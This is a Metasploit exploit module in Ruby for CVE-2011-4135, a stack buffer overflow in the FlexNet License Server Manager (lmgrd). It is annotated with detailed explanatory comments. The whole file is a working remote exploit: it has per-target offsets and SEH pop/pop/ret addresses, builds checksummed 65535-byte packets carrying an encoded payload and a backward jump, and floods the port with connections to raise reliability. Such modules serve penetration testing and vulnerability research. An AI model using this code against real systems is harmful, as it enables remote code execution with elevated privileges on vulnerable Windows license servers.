##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Module metadata plus the three options consumed by #exploit, #jam and
  # #do_exploit.
  #
  # Every non-Debug target carries three values read by #do_exploit:
  #   'Offset'          bytes of packet data that precede the SEH record
  #   'ShellcodeOffset' bytes of filler that precede the payload
  #   'Ret'             SEH handler address; the inline comments mark each
  #                     as a pop/pop/ret (ppr) gadget in lmgrd.exe
  # The 'Debug' target has none of them and sends a fixed filler instead.
  # 'Notes' leaves reliability, stability and side effects as UNKNOWN.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FlexNet License Server Manager lmgrd Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the FlexNet
          License Server Manager.

          The vulnerability is due to the insecure usage of memcpy
          in the lmgrd service when handling network packets, which
          results in a stack buffer overflow.

          In order to improve reliability, this module will make lots of
          connections to lmgrd during each attempt to maximize its success.
        },
        'Author' => [
          'Luigi Auriemma', # Vulnerability Discovery and PoC
          'Alexander Gavrun', # Vulnerability Discovery
          'juan vazquez', # Metasploit module
          'sinn3r' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-4135' ],
          [ 'OSVDB', '81899' ],
          [ 'BID', '52718' ],
          [ 'ZDI', '12-052' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
          [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Payload' => {
          # Upper bound on payload.encoded; see the invariant noted in #do_exploit.
          'Space' => 4000
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Debug', {} ],
          [
            'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',
            {
              'Offset' => 10476,
              'ShellcodeOffset' => 5484,
              'Ret' => 0x0047d01f # ppr (pop/pop/ret) from lmgrd.exe, used as the SEH handler
            }
          ],
          [
            'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',
            {
              'Offset' => 7324,
              'ShellcodeOffset' => 2332,
              'Ret' => 0x004eda91 # ppr (pop/pop/ret) from lmgrd.exe, used as the SEH handler
            }
          ],
          [
            'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',
            {
              'Offset' => 7320,
              'ShellcodeOffset' => 2328,
              'Ret' => 0x004eb2e1 # ppr (pop/pop/ret) from lmgrd.exe, used as the SEH handler
            }
          ],
        ],
        'DefaultTarget' => 1,
        'DisclosureDate' => '2012-03-23',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(27000),
        # Upper bound of the retry loop in #exploit.
        OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),
        # Passed straight to sleep between attempts in #exploit (seconds).
        OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),
        # Number of connect/put/disconnect cycles performed by #jam.
        OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])
      ]
    )
  end

  # Computes the one-byte header checksum of a packet.
  #
  # Sums byte 0 and bytes 2..19 of +packet+ -- byte 1 is skipped because
  # that is the slot #create_packet writes the result into -- and keeps
  # the low 8 bits.
  #
  # @param packet [String] at least 20 bytes; a shorter string raises when
  #   the loop indexes past the end of the unpacked byte array
  # @return [Integer] 0..255
  def header_checksum(packet)
    packet_bytes = packet.unpack("C*")
    checksum = packet_bytes[0]
    i = 2
    while i < 0x14 # 0x14 == 20, the header length #create_packet uses
      checksum = checksum + packet_bytes[i]
      i = i + 1
    end
    return (checksum & 0x0FF)
  end

  # Computes the 16-bit checksum over the packet body.
  #
  # First builds a 256-entry table of 16-bit words: for each index, eight
  # rounds of shift-right and conditional xor with 0x3A5D (the shape of a
  # reflected table-driven CRC; the exact variant is not named here). The
  # table is rebuilt on every call. Then each byte of +packet_data+ is
  # folded in: the byte xored with the low checksum byte selects a table
  # entry, which is xored with the checksum shifted right by 8.
  #
  # pack("S") and unpack("S*") are both native-endian, so the round trip
  # through +word_table+ is endianness-neutral.
  #
  # NOTE(review): the loop bound is packet_data.length (characters) while
  # +data_bytes+ is indexed per byte; this matches only while the string
  # is one byte per character -- confirm the encoding of what callers pass.
  #
  # @param packet_data [String]
  # @return [Integer] 0..0xFFFF; 0 for an empty string
  def data_checksum(packet_data)
    word_table = ""
    i = 0
    while i < 256
      v4 = 0
      v3 = i
      j = 8

      while j > 0
        if ((v4 ^ v3) & 1) == 1
          v4 = ((v4 >> 1) ^ 0x3A5D) & 0x0FFFF
        else
          v4 = (v4 >> 1) & 0x0FFFF
        end
        v3 >>= 1
        j = j - 1
      end

      word_table << [v4].pack("S")
      i = i + 1
    end
    k = 0
    checksum = 0
    data_bytes = packet_data.unpack("C*")
    word_table_words = word_table.unpack("S*")
    while k < packet_data.length
      position = data_bytes[k] ^ (checksum & 0x0FF)
      checksum = (word_table_words[position] ^ (checksum >> 8)) & 0x0FFFF
      k = k + 1
    end
    return checksum
  end

  # Wraps +data+ in the 20-byte lmgrd packet header and fills in the
  # length and both checksums.
  #
  # Layout (byte offsets):
  #   0      fixed first byte 0x2f
  #   1      header checksum (#header_checksum over bytes 0..19)
  #   2..3   data checksum (#data_checksum over bytes 4..end), big-endian
  #   4..5   total packet length, big-endian 16-bit
  #   6..19  fourteen zero bytes
  #   20..   +data+
  #
  # Order matters: the length is written first, the data checksum second
  # (it covers the length field), and the header checksum last (it covers
  # the data checksum field). The length is packed with "n", so a packet
  # longer than 65535 bytes would wrap; #do_exploit sizes its data so the
  # total is exactly 65535. Every packet this module sends -- the empty
  # ones from #jam and the attempt itself -- goes through here, so the
  # fixed first byte and the 20-byte header are common to all of them.
  #
  # @param data [String] packet body, may be empty
  # @return [String] the complete packet
  def create_packet(data)
    pkt = "\x2f"
    pkt << "\x00" # header checksum
    pkt << "\x00\x00" # data checksum
    pkt << "\x00\x00" # pkt length
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << data

    pkt[4, 2] = [pkt.length].pack("n")

    # Covers the length field, the zero bytes and the data.
    data_sum = data_checksum(pkt[4, pkt.length - 4])
    pkt[2, 2] = [data_sum].pack("n")

    # Covers the first 20 bytes, including the data checksum just written.
    hdr_sum = header_checksum(pkt[0, 20])
    pkt[1] = [hdr_sum].pack("C")

    return pkt
  end

  # Sends a header-only (20-byte, empty data) packet over datastore['Jam']
  # separate TCP connections, one after another, each opened, written and
  # closed in turn. Run on a framework thread by #do_exploit alongside the
  # attempt; the module description gives reliability as the reason. From a
  # monitoring standpoint, a burst of short-lived connections to RPORT each
  # carrying one 20-byte packet accompanies every attempt.
  def jam
    pkt = create_packet("")

    datastore['Jam'].times do
      connect
      sock.put(pkt)
      disconnect
    end
  end

  # Driver: calls #do_exploit up to datastore['Attempts'] times, sleeping
  # datastore['Wait'] between attempts, and stops early once a session
  # exists.
  #
  # NOTE(review): +i+ has already been incremented when the loop exits, so
  # the error message reports Attempts + 1 rather than the number of
  # attempts actually made. +and+ / +not+ are the low-precedence keyword
  # forms; they behave as written here, +&&+ / +!+ is the conventional
  # spelling.
  def exploit
    i = 1
    while i <= datastore['Attempts'] and not session_created?
      print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")
      do_exploit
      sleep(datastore['Wait'])
      i = i + 1
    end

    if not session_created?
      print_error("Exploit didn't work after #{i} attempts")
    end
  end

  # One attempt.
  #
  # Spawns #jam on a framework thread (the handle +t+ is never joined or
  # checked), then builds a 65535-byte packet and sends it on a fresh
  # connection, calling +handler+ before disconnecting.
  #
  # Debug target: the data is 65515 bytes of "a" and no payload.
  # Other targets, in order:
  #   rand_text(ShellcodeOffset)                  filler before the payload
  #   payload.encoded
  #   rand_text(Offset - ShellcodeOffset - len)   filler up to the SEH record
  #   generate_seh_record(target.ret)             from Msf::Exploit::Remote::Seh
  #   "jmp $-5000" assembled by Metasm            backwards relative jump
  #   rand_text(...)                              padding to 65535 bytes total
  #
  # Invariant: the third rand_text length is negative if payload.encoded is
  # longer than Offset - ShellcodeOffset, which is 4992 for every listed
  # target; 'Space' => 4000 in the metadata keeps it positive.
  def do_exploit
    t = framework.threads.spawn("jam", false) { jam }
    my_payload = payload.encoded

    header_length = 20 # See create_packet() to understand this number
    pkt_data = ""
    if target.name =~ /Debug/
      pkt_data << "a" * (65535 - header_length)
    else

      pkt_data << rand_text(target['ShellcodeOffset'])
      pkt_data << my_payload
      pkt_data << rand_text(target['Offset'] - target['ShellcodeOffset'] - my_payload.length)
      pkt_data << generate_seh_record(target.ret)
      pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
      pkt_data << rand_text(65535 - pkt_data.length - header_length)
    end

    pkt = create_packet(pkt_data)

    connect
    sock.put(pkt)
    handler
    disconnect
  end
end